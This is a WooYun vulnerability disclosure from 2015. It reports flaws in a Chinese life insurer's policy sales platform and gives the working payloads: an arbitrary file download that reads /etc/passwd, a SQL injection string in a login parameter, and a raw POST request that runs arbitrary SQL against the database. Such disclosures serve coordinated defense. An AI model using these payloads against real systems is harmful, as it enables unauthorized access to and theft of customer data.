当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148885

漏洞标题:利安人寿某系统漏洞打包(文件遍历\SQL注入\前台操作数据库等)

相关厂商:利安人寿

漏洞作者: 路人甲

提交时间:2015-10-23 16:21

修复时间:2015-12-11 16:58

公开时间:2015-12-11 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向核心白帽子及相关领域专家公开
2015-11-16: 细节向普通白帽子公开
2015-11-26: 细节向实习白帽子公开
2015-12-11: 细节向公众公开

简要描述:

漏洞打包

详细说明:

利安人寿远程出单销售平台
http://**.**.**.**:8001/lianlife/logon/main.jsp

QQ截图20151023135831.jpg


1#任意文件下载
http://**.**.**.**:8001/lianlife/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd

QQ截图20151023135945.jpg


QQ截图20151023140029.jpg

漏洞证明:

2#sql注入

http://**.**.**.**:8001/lianlife/logon/menu.jsp?userCode=null%27%20oR%2011%3D11%20anD%20%271%27%3D%271&Ip=123&nodecode=123


QQ截图20151023140712.jpg


QQ截图20151023140827.jpg


3#前台操作数据库

POST http://**.**.**.**:8001/lianlife/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://**.**.**.**:8001/lianlife/logon/main.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: **.**.**.**:8001
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=FKHwWpMKwkLLw5lhQyv5zjdhKhGSrvTpZKHyhbY56Wn4gGQTrCnQ!-503238362; K_V_D_JSESSIONID=lidheagdpecahcceppcbdcomnakkdajamlfidgilkepmiofnplpnkggnaiiikfmopjeamiklamog
strSql=select+*+from+tabs&strStart=1&LargeFlag=0


QQ截图20151023141338.jpg


大量数据

QQ截图20151023142031.jpg


QQ截图20151023142221.jpg


QQ截图20151023142415.jpg

修复方案:

补丁

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-27 16:56

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无